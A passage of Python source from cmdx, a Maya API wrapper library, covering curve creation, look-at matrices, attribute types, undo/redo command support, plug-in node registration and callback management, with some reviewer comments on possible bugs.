        form (int, optional): Whether to close the curve or not

    Example:
        >>> parent = createNode("transform")
        >>> shape = curve(parent, [
        ...     (0, 0, 0),
        ...     (0, 1, 0),
        ...     (0, 2, 0),
        ... ])
        ...

    """
    assert isinstance(parent, DagNode), (
        "parent must be of type cmdx.DagNode"
    )

    assert parent._modifier is None or parent._modifier.isDone, (
        "curve() currently doesn't work with a modifier"
    )

    # Superimpose end knots
    # startpoints = [points[0]] * (degree - 1)
    # endpoints = [points[-1]] * (degree - 1)
    # points = startpoints + list(points) + endpoints

    # MFnNurbsCurve supports degrees 1 through 3 only
    degree = min(3, max(1, degree))

    cvs = om1.MPointArray()
    knots = om1.MDoubleArray()
    curveFn = om1.MFnNurbsCurve()

    # Uniform knot vector; #knots = #spans + 2 * degree - 1
    knotcount = len(points) - degree + 2 * degree - 1

    for point in points:
        cvs.append(om1.MPoint(*point))

    for index in range(knotcount):
        knots.append(index)

    mobj = curveFn.create(cvs,
                          knots,
                          degree,
                          form,
                          False,
                          True,
                          _encode1(parent.path()))

    mod = om1.MDagModifier()
    mod.renameNode(mobj, parent.name(namespace=True) + "Shape")
    mod.doIt()

    def undo():
        mod.deleteNode(mobj)
        mod.doIt()

    def redo():
        # NOTE(review): this undoes the deletion performed by
        # `undo` above, rather than re-running creation -- confirm
        mod.undoIt()

    commit(undo, redo)

    shapeFn = om1.MFnDagNode(mobj)
    return encode(shapeFn.fullPathName())
def lookAt(origin, center, up=None):
    """Build a (left-handed) look-at matrix

    See glm::glc::matrix_transform::lookAt for reference

             + Z (up)
            /
           /
    (origin) o------ + X (center)
               \\
                + Y

    Arguments:
        origin (Vector): Starting position
        center (Vector): Point towards this
        up (Vector, optional): Up facing this way, defaults to Y-up

    Example:
        >>> mat = lookAt(
        ...     (0, 0, 0),  # Relative the origin..
        ...     (1, 0, 0),  # X-axis points towards global X
        ...     (0, 1, 0)   # Z-axis points towards global Y
        ... )
        >>> tm = Tm(mat)
        >>> int(degrees(tm.rotation().x))
        -90

    """
    if isinstance(origin, (tuple, list)):
        origin = Vector(origin)

    if isinstance(center, (tuple, list)):
        center = Vector(center)

    if up is not None and isinstance(up, (tuple, list)):
        up = Vector(up)

    up = up or Vector(0, 1, 0)

    x = (center - origin).normalize()
    y = ((center - origin) ^ (center - up)).normalize()
    z = x ^ y

    # BUGFIX: the bottom-right element of a homogeneous 4x4 transform
    # must be 1; it was previously 0, yielding a degenerate matrix
    # under multiplication. Rotation extraction, as in the example
    # above, was unaffected by this.
    return MatrixType((
        x[0], x[1], x[2], 0,
        y[0], y[1], y[2], 0,
        z[0], z[1], z[2], 0,
        0, 0, 0, 1
    ))
if ENABLE_PEP8:
    # snake_case alias
    look_at = lookAt
def first(iterator, default=None):
    """Return first member of an `iterator`, or `default` if empty

    Accepts any iterable, not only iterators.

    Example:
        >>> def it():
        ...   yield 1
        ...   yield 2
        ...   yield 3
        ...
        >>> first(it())
        1

    """
    # iter() is a no-op on iterators, and generalises
    # this function to plain iterables such as lists
    return next(iter(iterator), default)
def last(iterator, default=None):
    """Return last member of an `iterator`, or `default` if empty

    Example:
        >>> def it():
        ...   yield 1
        ...   yield 2
        ...   yield 3
        ...
        >>> last(it())
        3

    """
    # The loop variable keeps the final value it was bound to;
    # with an empty iterator it remains `default`
    result = default
    for result in iterator:
        pass

    return result
# --------------------------------------------------------
#
# Attribute Types
#
# --------------------------------------------------------
class _AbstractAttribute(dict):
    # Function set used to build the underlying attribute MObject
    Fn = None
    # Maya type constant, e.g. om.MFnNumericData.kDouble
    Type = None
    Default = None

    Readable = True
    Writable = True
    Cached = True  # Cache in datablock?
    Storable = True  # Write value to file?
    Hidden = False  # Display in Attribute Editor?

    Array = False
    Connectable = True

    Keyable = True
    ChannelBox = False
    AffectsAppearance = False
    AffectsWorldSpace = False

    Help = ""

    def __eq__(self, other):
        try:
            # Support Attribute -> Attribute comparison
            return self["name"] == other["name"]
        except AttributeError:
            # Support Attribute -> string comparison
            return self["name"] == other

    def __ne__(self, other):
        try:
            return self["name"] != other["name"]
        except AttributeError:
            return self["name"] != other

    def __hash__(self):
        """Support storing in set()"""
        return hash(self["name"])

    def __repr__(self):
        """Avoid repr depicting the full contents of this dict"""
        return self["name"]

    def __new__(cls, *args, **kwargs):
        """Support for using name of assignment

        Example:
            node["thisName"] = cmdx.Double()

        In this example, the attribute isn't given a `name`
        Instead, the name is inferred from where it is assigned.

        """
        # Called without arguments, e.g. cmdx.Double(); hand back
        # the class and kwargs so the assignment site can supply
        # the missing name later
        if not args:
            return cls, kwargs

        return super(_AbstractAttribute, cls).__new__(cls, *args, **kwargs)

    def __init__(self,
                 name,
                 default=None,
                 label=None,
                 writable=None,
                 readable=None,
                 cached=None,
                 storable=None,
                 keyable=None,
                 hidden=None,
                 min=None,
                 max=None,
                 channelBox=None,
                 affectsAppearance=None,
                 affectsWorldSpace=None,
                 array=False,
                 connectable=True,
                 help=None):
        # Snapshot of every argument; specific keys are popped below,
        # the remainder fall through to the defaulting loop at the end
        args = locals().copy()
        args.pop("self")

        self["name"] = args.pop("name")
        self["label"] = args.pop("label")
        self["default"] = args.pop("default")

        # Exclusive to numeric attributes
        self["min"] = args.pop("min")
        self["max"] = args.pop("max")

        # Filled in on creation
        self["mobject"] = None

        # MyName -> myName
        self["shortName"] = self["name"][0].lower() + self["name"][1:]

        # Arguments passed as None fall back to the class-level
        # default of the same (capitalised) name, e.g. Writable
        for key, value in args.items():
            default = getattr(self, key[0].upper() + key[1:])
            self[key] = value if value is not None else default

    def default(self, cls=None):
        """Return one of three available values

        Resolution order:
            1. Argument
            2. Node default (from cls.defaults)
            3. Attribute default

        """
        if self["default"] is not None:
            return self["default"]

        if cls is not None:
            return cls.defaults.get(self["name"], self.Default)

        return self.Default

    def type(self):
        return self.Type

    def create(self, cls=None):
        """Build and return the underlying attribute MObject"""
        # MFn*Attribute.create(longName, shortName[, type[, default]]);
        # a None type (e.g. Enum) is simply omitted
        args = [
            arg
            for arg in (self["name"],
                        self["shortName"],
                        self.type())
            if arg is not None
        ]

        default = self.default(cls)
        if default:
            if isinstance(default, (list, tuple)):
                args += default
            else:
                args += [default]

        self["mobject"] = self.Fn.create(*args)

        # 3 μs
        self.Fn.storable = self["storable"]
        self.Fn.readable = self["readable"]
        self.Fn.writable = self["writable"]
        self.Fn.connectable = self["connectable"]
        self.Fn.hidden = self["hidden"]
        self.Fn.cached = self["cached"]
        self.Fn.keyable = self["keyable"]
        self.Fn.channelBox = self["channelBox"]
        self.Fn.affectsAppearance = self["affectsAppearance"]
        self.Fn.affectsWorldSpace = self["affectsWorldSpace"]
        self.Fn.array = self["array"]

        if self["min"] is not None:
            self.Fn.setMin(self["min"])

        if self["max"] is not None:
            self.Fn.setMax(self["max"])

        if self["label"] is not None:
            self.Fn.setNiceNameOverride(self["label"])

        return self["mobject"]

    def read(self, data):
        # Implemented by subclasses; reads from an MDataBlock
        pass
class Enum(_AbstractAttribute):
    """Enum attribute, one field per option"""

    Fn = om.MFnEnumAttribute()
    Type = None
    Default = 0

    Keyable = True

    def __init__(self, name, fields=None, default=0, label=None, **kwargs):
        super(Enum, self).__init__(name, default, label, **kwargs)

        # Fall back to a single field, named after the attribute
        self.update({
            "fields": fields or (name,),
        })

    def create(self, cls=None):
        attr = super(Enum, self).create(cls)

        for index, field in enumerate(self["fields"]):
            self.Fn.addField(field, index)

        return attr

    def read(self, data):
        return data.inputValue(self["mobject"]).asShort()
class Divider(Enum):
    """Visual divider in channel box"""

    def __init__(self, label, **kwargs):
        # The label doubles as name and single enum field;
        # discard any conflicting keyword arguments
        kwargs.pop("name", None)
        kwargs.pop("fields", None)
        kwargs.pop("label", None)

        super(Divider, self).__init__(label, fields=(label,), label=" ", **kwargs)
class String(_AbstractAttribute):
    Fn = om.MFnTypedAttribute()
    Type = om.MFnData.kString
    Default = ""

    def default(self, cls=None):
        # Wrap the plain-string default in MFnStringData,
        # as expected by MFnTypedAttribute.create
        default = str(super(String, self).default(cls))
        return om.MFnStringData().create(default)

    def read(self, data):
        return data.inputValue(self["mobject"]).asString()
class Message(_AbstractAttribute):
    """Message attribute, carrying connections rather than data"""

    Fn = om.MFnMessageAttribute()
    Type = None
    Default = None
    Storable = False
class Matrix(_AbstractAttribute):
    Fn = om.MFnMatrixAttribute()

    # NOTE(review): all zeroes -- not actually an identity matrix
    Default = (0.0,) * 4 * 4

    Array = False
    Readable = True
    Keyable = False
    Hidden = False

    def default(self, cls=None):
        # No default is passed to MFnMatrixAttribute.create,
        # regardless of the Default above
        return None

    def read(self, data):
        return data.inputValue(self["mobject"]).asMatrix()
class Long(_AbstractAttribute):
    """Numeric attribute of integer type"""

    Fn = om.MFnNumericAttribute()
    Type = om.MFnNumericData.kLong
    Default = 0

    def read(self, data):
        return data.inputValue(self["mobject"]).asLong()
class Double(_AbstractAttribute):
    """Numeric attribute of double-precision float type"""

    Fn = om.MFnNumericAttribute()
    Type = om.MFnNumericData.kDouble
    Default = 0.0

    def read(self, data):
        return data.inputValue(self["mobject"]).asDouble()
class Double3(_AbstractAttribute):
    Fn = om.MFnNumericAttribute()
    Type = None
    Default = (0.0,) * 3

    def default(self, cls=None):
        """Build and return the three child attributes

        Same resolution order as the base class; a single scalar
        default is broadcast across all three children.

        """
        if self["default"] is not None:
            default = self["default"]

            # Support single-value default
            if not isinstance(default, (tuple, list)):
                default = (default,) * 3

        elif cls is not None:
            default = cls.defaults.get(self["name"], self.Default)

        else:
            default = self.Default

        # One child per axis, e.g. translateX/translateY/translateZ;
        # the base create() receives this list as extra arguments
        children = list()
        for index, child in enumerate("XYZ"):
            attribute = self.Fn.create(self["name"] + child,
                                       self["shortName"] + child,
                                       om.MFnNumericData.kDouble,
                                       default[index])
            children.append(attribute)

        return children

    def read(self, data):
        return data.inputValue(self["mobject"]).asDouble3()
class Boolean(_AbstractAttribute):
    """Numeric attribute of boolean type"""

    Fn = om.MFnNumericAttribute()
    Type = om.MFnNumericData.kBoolean
    Default = True

    def read(self, data):
        return data.inputValue(self["mobject"]).asBool()
class AbstractUnit(_AbstractAttribute):
    """Base for unit-bearing attributes: Angle, Time and Distance"""

    Fn = om.MFnUnitAttribute()
    Default = 0.0
    Min = None
    Max = None
    SoftMin = None
    SoftMax = None
class Angle(AbstractUnit):
    def default(self, cls=None):
        default = super(Angle, self).default(cls)

        # When no unit was explicitly passed, assume degrees
        if not isinstance(default, om.MAngle):
            default = om.MAngle(default, om.MAngle.kDegrees)

        return default
class Time(AbstractUnit):
    def default(self, cls=None):
        default = super(Time, self).default(cls)

        # When no unit was explicitly passed, assume seconds
        if not isinstance(default, om.MTime):
            default = om.MTime(default, om.MTime.kSeconds)

        return default
class Distance(AbstractUnit):
    def default(self, cls=None):
        default = super(Distance, self).default(cls)

        # When no unit was explicitly passed, assume centimeters
        if not isinstance(default, om.MDistance):
            default = om.MDistance(default, om.MDistance.kCentimeters)

        return default
class Compound(_AbstractAttribute):
    """Attribute composed of child attributes"""

    Fn = om.MFnCompoundAttribute()
    # Subclasses set Multi = (suffixes, child type),
    # e.g. ("XYZ", Double) -- see Double2/Angle3 et al below
    Multi = None

    def __init__(self, name, children=None, **kwargs):
        if not children and self.Multi:
            default = kwargs.pop("default", None)
            children, Type = self.Multi

            # One child per suffix letter, e.g. nameX, nameY;
            # a sequence default supplies one value per child
            children = tuple(
                Type(name + child, default=default[index], **kwargs)
                if default else Type(name + child, **kwargs)
                for index, child in enumerate(children)
            )

            self["children"] = children

        else:
            self["children"] = children

        super(Compound, self).__init__(name, **kwargs)

    def default(self, cls=None):
        # Compound itself has no defaults, only its children do
        pass

    def create(self, cls=None):
        mobj = super(Compound, self).create(cls)
        default = super(Compound, self).default(cls)

        for index, child in enumerate(self["children"]):
            # Forward attributes from parent to child
            for attr in ("storable",
                         "readable",
                         "writable",
                         "hidden",
                         "channelBox",
                         "keyable",
                         "array"):
                child[attr] = self[attr]

            if child["default"] is None and default is not None:
                child["default"] = default[index]

            self.Fn.addChild(child.create(cls))

        return mobj

    def read(self, handle):
        """Read from MDataHandle"""
        output = list()

        for child in self["children"]:
            child_handle = handle.child(child["mobject"])
            output.append(child.read(child_handle))

        return tuple(output)
# Pre-baked compounds; Multi = (child suffixes, child type)
class Double2(Compound):
    Multi = ("XY", Double)


class Double4(Compound):
    Multi = ("XYZW", Double)


class Angle2(Compound):
    Multi = ("XY", Angle)


class Angle3(Compound):
    Multi = ("XYZ", Angle)


class Distance2(Compound):
    Multi = ("XY", Distance)


class Distance3(Compound):
    Multi = ("XYZ", Distance)


class Distance4(Compound):
    Multi = ("XYZW", Distance)
# Convenience aliases, for when it isn't clear e.g. `Matrix()`
# is referring to an attribute rather than the datatype.
EnumAttribute = Enum
DividerAttribute = Divider
StringAttribute = String
MessageAttribute = Message
MatrixAttribute = Matrix
LongAttribute = Long
DoubleAttribute = Double
Double3Attribute = Double3
BooleanAttribute = Boolean
AbstractUnitAttribute = AbstractUnit
AngleAttribute = Angle
TimeAttribute = Time
DistanceAttribute = Distance
CompoundAttribute = Compound
Double2Attribute = Double2
Double4Attribute = Double4
Angle2Attribute = Angle2
Angle3Attribute = Angle3
Distance2Attribute = Distance2
Distance3Attribute = Distance3
Distance4Attribute = Distance4
# --------------------------------------------------------
#
# Undo/Redo Support
#
# NOTE: Localised version of apiundo.py 0.2.0
# https://github.com/mottosso/apiundo
#
# In Maya, history is maintained by "commands". Each command is an instance of
# MPxCommand that encapsulates a series of API calls coupled with their
# equivalent undo/redo API calls. For example, the `createNode` command
# is presumably coupled with `cmds.delete`, `setAttr` is presumably
# coupled with another `setAttr` with the previous values passed in.
#
# Thus, creating a custom command involves subclassing MPxCommand and
# implementing coupling your do, undo and redo into one neat package.
#
# cmdx however doesn't fit into this framework.
#
# With cmdx, you call upon API calls directly. There is little to no
# correlation between each of your calls, which is great for performance
# but not so great for conforming to the undo/redo framework set forth
# by Autodesk.
#
# To work around this, without losing out on performance or functionality,
# a generic command is created, capable of hosting arbitrary API calls
# and storing them in the Undo/Redo framework.
#
# >>> node = cmdx.createNode("transform")
# >>> cmdx.commit(lambda: cmdx.delete(node))
#
# Now when you go to undo, the `lambda` is called. It is then up to you
# the developer to ensure that what is being undone actually relates
# to what you wanted to have undone. For example, it is perfectly
# possible to add an unrelated call to history.
#
# >>> node = cmdx.createNode("transform")
# >>> cmdx.commit(lambda: cmdx.setAttr(node + "translateX", 5))
#
# The result would be setting an attribute to `5` when attempting to undo.
#
# --------------------------------------------------------
# Support for multiple co-existing versions of apiundo.
# NOTE: This is important for vendoring, as otherwise a vendored apiundo
# could register e.g. cmds.apiUndo() first, causing a newer version
# to inadvertently use this older command (or worse yet, throwing an
# error when trying to register it again).
command = "_cmdxApiUndo_%s" % __version__.replace(".", "_")

# This module is both a Python module and Maya plug-in.
# Data is shared amongst the two through this "module"
name = "_cmdxShared_"
if name not in sys.modules:
    sys.modules[name] = types.ModuleType(name)

shared = sys.modules[name]

# undo/redo hold ids of the callables most recently committed;
# undos/redos map those ids to the callables themselves
shared.undo = None
shared.redo = None
shared.undos = {}
shared.redos = {}
def commit(undo, redo=lambda: None):
    """Commit `undo` and `redo` to history

    Arguments:
        undo (func): Call this function on next undo
        redo (func, optional): Like `undo`, but for redo

    """
    if not ENABLE_UNDO:
        return

    if not hasattr(cmds, command):
        install()

    # Precautionary measure.
    # If this doesn't pass, odds are we've got a race condition.
    # NOTE: This assumes calls to `commit` can only be done
    # from a single thread, which should already be the case
    # given that Maya's API is not threadsafe.
    try:
        assert shared.redo is None and shared.undo is None
    except AssertionError:
        log.debug("%s has a problem with undo" % __name__)

    # Temporarily store the functions at shared-level,
    # they are later picked up by the command once called.
    shared.undo = "%x" % id(undo)
    shared.redo = "%x" % id(redo)
    shared.undos[shared.undo] = undo
    shared.redos[shared.redo] = redo

    # Let Maya know that something is undoable
    getattr(cmds, command)()
def install():
    """Load this shared as a plug-in

    Call this prior to using the shared

    """
    if ENABLE_UNDO:
        # The module file itself doubles as the Maya plug-in
        cmds.loadPlugin(__file__, quiet=True)

        # NOTE(review): `self` is presumably a module-level
        # self-reference (sys.modules[__name__]) defined earlier
        # in the file -- confirm, else this raises NameError
        self.installed = True
def uninstall():
    """Unload the plug-in and discard all shared undo state"""
    if ENABLE_UNDO:
        # Plug-in may exist in undo queue and
        # therefore cannot be unloaded until flushed.
        cmds.flushUndo()

        # Discard shared module
        shared.undo = None
        shared.redo = None
        shared.undos.clear()
        shared.redos.clear()

        sys.modules.pop(name, None)

    cmds.unloadPlugin(os.path.basename(__file__))

    # NOTE(review): `self` is presumably a module-level
    # self-reference defined earlier in the file -- confirm
    self.installed = False
def maya_useNewAPI():
    """Tell Maya this plug-in uses the Python API 2.0"""
    pass
class _apiUndo(om.MPxCommand):
    """Generic command hosting the callables passed to `commit`"""

    def doIt(self, args):
        # Pick up the callables stashed by `commit`
        # immediately before this command was invoked
        self.undo = shared.undo
        self.redo = shared.redo

        # Facilitate the above precautionary measure
        shared.undo = None
        shared.redo = None

    def undoIt(self):
        shared.undos[self.undo]()

    def redoIt(self):
        shared.redos[self.redo]()

    def isUndoable(self):
        # Without this, the above undoIt and redoIt will not be called
        return True
def initializePlugin(plugin):
    """Maya plug-in entry point; register the undo command"""
    om.MFnPlugin(plugin).registerCommand(
        command,
        _apiUndo
    )
def uninitializePlugin(plugin):
    """Maya plug-in exit point; deregister the undo command"""
    om.MFnPlugin(plugin).deregisterCommand(command)
# --------------------------------------------------------
#
# Commonly Node Types
#
# Creating a new node using a pre-defined Type ID is 10% faster
# than doing it using a string, but keeping all (~800) around
# has a negative impact on maintainability and readability of
# the project, so a balance is struck where only the most
# performance sensitive types are included here.
#
# Developers: See cmdt.py for a list of all available types and their IDs
#
# --------------------------------------------------------
# Pre-baked MTypeId constants for commonly-created node types;
# pass these to createNode() in place of a type-name string
tAddDoubleLinear = om.MTypeId(0x4441444c)
tAddMatrix = om.MTypeId(0x44414d58)
tAngleBetween = om.MTypeId(0x4e414254)
tBlendShape = om.MTypeId(0x46424c53)
tMultMatrix = om.MTypeId(0x444d544d)
tAngleDimension = om.MTypeId(0x4147444e)
tBezierCurve = om.MTypeId(0x42435256)
tCamera = om.MTypeId(0x4443414d)
tChoice = om.MTypeId(0x43484345)
tChooser = om.MTypeId(0x43484f4f)
tCondition = om.MTypeId(0x52434e44)
tMesh = om.MTypeId(0x444d5348)
tNurbsCurve = om.MTypeId(0x4e435256)
tNurbsSurface = om.MTypeId(0x4e535246)
tJoint = om.MTypeId(0x4a4f494e)
tTransform = om.MTypeId(0x5846524d)
tTransformGeometry = om.MTypeId(0x5447454f)
tWtAddMatrix = om.MTypeId(0x4457414d)
# --------------------------------------------------------
#
# Plug-ins
#
# --------------------------------------------------------
InstalledPlugins = dict()

# Shorthand for the API 2.0 type-id class
TypeId = om.MTypeId

# Get your unique ID from Autodesk, the below
# should not be trusted for production.
# Base 0 lets CMDX_BASETYPEID be hex ("0x...") or decimal.
StartId = int(os.getenv("CMDX_BASETYPEID", "0x12b9c0"), 0)
class MetaNode(type):
    """Metaclass for plug-in node types

    Validates class attributes, auto-names Divider attributes,
    and bakes fast attribute-lookup helpers onto each node class.

    """

    def __init__(cls, *args, **kwargs):
        assert isinstance(cls.name, str)
        assert isinstance(cls.defaults, dict)
        assert isinstance(cls.attributes, list)
        assert isinstance(cls.version, tuple)

        if isinstance(cls.typeid, (int, float)):
            cls.typeid = TypeId(cls.typeid)

        # Support Divider plug-in, without name for readability.
        # E.g. Divider("_", "Label") -> Divider("Label")
        index = 1
        for attribute in cls.attributes:
            if isinstance(attribute, Divider):
                attribute["name"] = "_" * index
                attribute["shortName"] = "_" * index
                index += 1

        # Ensure no duplicates
        assert len(set(cls.attributes)) == len(cls.attributes), (
            "One or more attributes in '%s' was found more than once"
            % cls.__name__
        )

        attributes = {attr["name"]: attr for attr in cls.attributes}

        # Closures over `attributes`, one set per node class
        def findAttribute(self, name):
            return attributes.get(name)

        def findMObject(self, name):
            return attributes.get(name)["mobject"]

        def findPlug(self, node, name):
            # NOTE(review): a missing name makes .get(name) return
            # None, raising TypeError (not KeyError) on subscript;
            # the except below may never fire -- confirm
            try:
                mobj = attributes.get(name)["mobject"]
                return om.MPlug(node, mobj)
            except KeyError:
                return None

        cls.findAttribute = findAttribute
        cls.findMObject = findMObject
        cls.findPlug = findPlug

        cls.find_attribute = findAttribute
        cls.find_mobject = findMObject
        cls.find_plug = findPlug

        cls.log = logging.getLogger(cls.__name__)

        return super(MetaNode, cls).__init__(*args, **kwargs)
@add_metaclass(MetaNode)
class DgNode(om.MPxNode):
    """Baseclass for Dependency Graph plug-in nodes

    Class attributes, validated by the MetaNode metaclass:
        name (str): Node type name, as used by e.g. cmds.createNode
        typeid: Unique node type ID from Autodesk (see Ids above)
        version (tuple): Plug-in version number
        attributes (list): Attribute declarations of this node
        affects (list): Pairs of (source, destination) attribute names
        ranges (dict): Value ranges per attribute
        defaults (dict): Default attribute values
    """

    name = "defaultNode"
    typeid = TypeId(StartId)
    version = (0, 0)
    attributes = []
    affects = []
    ranges = {}
    defaults = {}

    @classmethod
    def postInitialize(cls):
        """Called once the plug-in has been registered; override as needed"""
@add_metaclass(MetaNode)
class SurfaceShape(om.MPxSurfaceShape):
    """Baseclass for surface shape plug-in nodes

    Class attributes, validated by the MetaNode metaclass:
        name (str): Node type name, as used by e.g. cmds.createNode
        typeid: Unique node type ID from Autodesk (see Ids above)
        classification (str): Draw classification string
        version (tuple): Plug-in version number
        attributes (list): Attribute declarations of this node
        affects (list): Pairs of (source, destination) attribute names
        ranges (dict): Value ranges per attribute
        defaults (dict): Default attribute values
    """

    name = "defaultNode"
    typeid = TypeId(StartId)
    classification = "drawdb/geometry/custom"
    version = (0, 0)
    attributes = []
    affects = []
    ranges = {}
    defaults = {}

    @classmethod
    def postInitialize(cls):
        """Called once the plug-in has been registered; override as needed"""

    @classmethod
    def uiCreator(cls):
        """Passed to registerShape as the UI creator; override as needed"""
@add_metaclass(MetaNode)
class SurfaceShapeUI(omui.MPxSurfaceShapeUI):
    """Baseclass for the UI companion of a surface shape plug-in

    Class attributes, validated by the MetaNode metaclass:
        name (str): Node type name, as used by e.g. cmds.createNode
        typeid: Unique node type ID from Autodesk (see Ids above)
        classification (str): Draw classification string
        version (tuple): Plug-in version number
        attributes (list): Attribute declarations of this node
        affects (list): Pairs of (source, destination) attribute names
        ranges (dict): Value ranges per attribute
        defaults (dict): Default attribute values
    """

    name = "defaultNode"
    typeid = TypeId(StartId)
    classification = "drawdb/geometry/custom"
    version = (0, 0)
    attributes = []
    affects = []
    ranges = {}
    defaults = {}

    @classmethod
    def postInitialize(cls):
        """Called once the plug-in has been registered; override as needed"""
@add_metaclass(MetaNode)
class LocatorNode(omui.MPxLocatorNode):
    """Baseclass for locator plug-in nodes

    Class attributes, validated by the MetaNode metaclass:
        name (str): Node type name, as used by e.g. cmds.createNode
        typeid: Unique node type ID from Autodesk (see Ids above)
        classification (str): Draw classification string
        version (tuple): Plug-in version number
        attributes (list): Attribute declarations of this node
        affects (list): Pairs of (source, destination) attribute names
        ranges (dict): Value ranges per attribute
        defaults (dict): Default attribute values
    """

    name = "defaultNode"
    typeid = TypeId(StartId)
    classification = "drawdb/geometry/custom"
    version = (0, 0)
    attributes = []
    affects = []
    ranges = {}
    defaults = {}

    @classmethod
    def postInitialize(cls):
        """Called once the plug-in has been registered; override as needed"""
def initialize2(Plugin):
    """Return an `initializePlugin` entry point for `Plugin`

    Written for plug-ins using Maya Python API 2.0

    Arguments:
        Plugin (class): Subclass of DgNode, SurfaceShape or LocatorNode

    """

    def _nodeInit():
        """Create and register attributes, then wire up `affects`"""
        nameToAttr = {}
        for attr in Plugin.attributes:
            mattr = attr.create(Plugin)
            Plugin.addAttribute(mattr)
            nameToAttr[attr["name"]] = mattr

        for src, dst in Plugin.affects:
            log.debug("'%s' affects '%s'" % (src, dst))
            Plugin.attributeAffects(nameToAttr[src], nameToAttr[dst])

    def _nodeCreator():
        return Plugin()

    def initializePlugin(obj):
        version = ".".join(map(str, Plugin.version))
        plugin = om.MFnPlugin(obj, "Cmdx", version, "Any")

        # NOTE: the original wrapped this in a redundant
        # `try/except Exception: raise/else` — removed, as re-raising
        # unconditionally is equivalent to no handler at all.
        if issubclass(Plugin, LocatorNode):
            plugin.registerNode(Plugin.name,
                                Plugin.typeid,
                                _nodeCreator,
                                _nodeInit,
                                om.MPxNode.kLocatorNode,
                                Plugin.classification)

        elif issubclass(Plugin, DgNode):
            plugin.registerNode(Plugin.name,
                                Plugin.typeid,
                                _nodeCreator,
                                _nodeInit)

        elif issubclass(Plugin, SurfaceShape):
            plugin.registerShape(Plugin.name,
                                 Plugin.typeid,
                                 _nodeCreator,
                                 _nodeInit,
                                 Plugin.uiCreator,
                                 Plugin.classification)

        else:
            raise TypeError("Unsupported subclass: '%s'" % Plugin)

        # Only reached on successful registration, exactly as the
        # previous `else` clause behaved.
        # Maintain reference to original class
        InstalledPlugins[Plugin.name] = Plugin

        Plugin.postInitialize()

    return initializePlugin
def uninitialize2(Plugin):
    """Return an `uninitializePlugin` entry point for `Plugin`"""

    def uninitializePlugin(obj):
        plugin = om.MFnPlugin(obj)
        plugin.deregisterNode(Plugin.typeid)

    return uninitializePlugin
# Plugins written with Maya Python API 1.0
class MPxManipContainer1(ompx1.MPxManipContainer):
    """Baseclass for manipulator containers, using Maya Python API 1.0

    Registered via :func:`initializeManipulator1`. Note that `name`
    must end with "Manip" (asserted at registration time).
    """
    name = "defaultManip"
    version = (0, 0)
    # ownerid is the type ID of the node this manipulator connects to,
    # passed to MPxManipContainer.addToManipConnectTable at registration
    ownerid = om1.MTypeId(StartId)
    typeid = om1.MTypeId(StartId)
def initializeManipulator1(Manipulator):
    """Return an `initializePlugin` entry point for `Manipulator`

    Written for manipulators using Maya Python API 1.0

    Arguments:
        Manipulator (class): MPxManipContainer1 subclass to register

    """

    def _manipulatorCreator():
        return ompx1.asMPxPtr(Manipulator())

    def _manipulatorInit():
        ompx1.MPxManipContainer.addToManipConnectTable(Manipulator.ownerid)
        ompx1.MPxManipContainer.initialize()

    def initializePlugin(obj):
        version = ".".join(map(str, Manipulator.version))
        plugin = ompx1.MFnPlugin(obj, "Cmdx", version, "Any")

        # NOTE(marcus): The name *must* end with Manip
        # See https://download.autodesk.com/us/maya/2011help
        # /API/class_m_px_manip_container.html
        # #e95527ff30ae53c8ae0419a1abde8b0c
        # BUGFIX: the '%s' placeholder was never filled in; apply the
        # formatting so the message actually names the manipulator.
        assert Manipulator.name.endswith("Manip"), (
            "Manipulator '%s' must have the name of a plug-in, "
            "and end with 'Manip'" % Manipulator.name
        )

        plugin.registerNode(
            Manipulator.name,
            Manipulator.typeid,
            _manipulatorCreator,
            _manipulatorInit,
            ompx1.MPxNode.kManipContainer
        )

    return initializePlugin
def uninitializeManipulator1(Manipulator):
    """Return an `uninitializePlugin` entry point for `Manipulator`"""

    def uninitializePlugin(obj):
        plugin = ompx1.MFnPlugin(obj)
        plugin.deregisterNode(Manipulator.typeid)

    return uninitializePlugin
def findPlugin(name):
    """Find the original class of a plug-in by `name`"""
    if name not in InstalledPlugins:
        raise ExistError("'%s' is not a recognised plug-in" % name)

    return InstalledPlugins[name]
# --------------------------
#
# Callback Manager
#
# --------------------------
class Callback(object):
    """A Maya callback"""

    log = logging.getLogger("cmdx.Callback")

    def __init__(self, name, installer, args, api=2, help="", parent=None):
        self._id = None
        self._name = name
        self._installer = installer
        self._args = args
        self._help = help

        # Callbacks are all uninstalled using the same function
        # relative either API 1.0 or 2.0
        uninstallers = {
            1: om1.MMessage.removeCallback,
            2: om.MMessage.removeCallback,
        }
        self._uninstaller = uninstallers[api]

    def __del__(self):
        self.deactivate()

    def name(self):
        return self._name

    def help(self):
        return self._help

    def is_active(self):
        return self._id is not None

    def activate(self):
        self.log.debug("Activating callback '%s'.." % self._name)

        if self.is_active():
            self.log.debug("%s already active, ignoring" % self._name)
            return

        self._id = self._installer(*self._args)

    def deactivate(self):
        self.log.debug("Deactivating callback '%s'.." % self._name)

        if not self.is_active():
            return

        self._uninstaller(self._id)
        self._id = None
class CallbackGroup(list):
    """Multiple callbacks rolled into one"""

    def __init__(self, name, callbacks, parent=None):
        self._name = name
        self[:] = callbacks

    def name(self):
        return self._name

    def add(self, name, installer, args, api=2):
        """Convenience method for .append(Callback())"""
        callback = Callback(name, installer, args, api)
        self.append(callback)

    def activate(self):
        # BUGFIX: members live in the list itself (see __init__);
        # `self._callbacks` was never assigned and raised AttributeError
        for callback in self:
            callback.activate()

    def deactivate(self):
        # BUGFIX: same as activate() — iterate the list itself
        for callback in self:
            callback.deactivate()
# ----------------------
#
# Cache Manager
#
# ----------------------
class Cache(object):
    """Cache manager — placeholder, methods not yet implemented"""

    def __init__(self):
        self._values = {}

    def clear(self, node=None):
        """Placeholder; intended to erase stored values"""

    def read(self, node, attr, time):
        """Placeholder; intended to return a stored value"""

    def transform(self, node):
        """Placeholder; intended to return a stored transform"""
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
| cmdx.py | 154,791 | Maya's MBoundingBox
Returned in place of an actual plug
A Maya callback
Multiple callbacks rolled into one
Modifier for DG nodes
Modifier for DAG nodes
Example:
>>> with DagModifier() as mod:
... node1 = mod.createNode("transform")
... node2 = mod.createNode("transform", parent=node1)
... mod.setAttr(node1["translate"], (1, 2, 3))
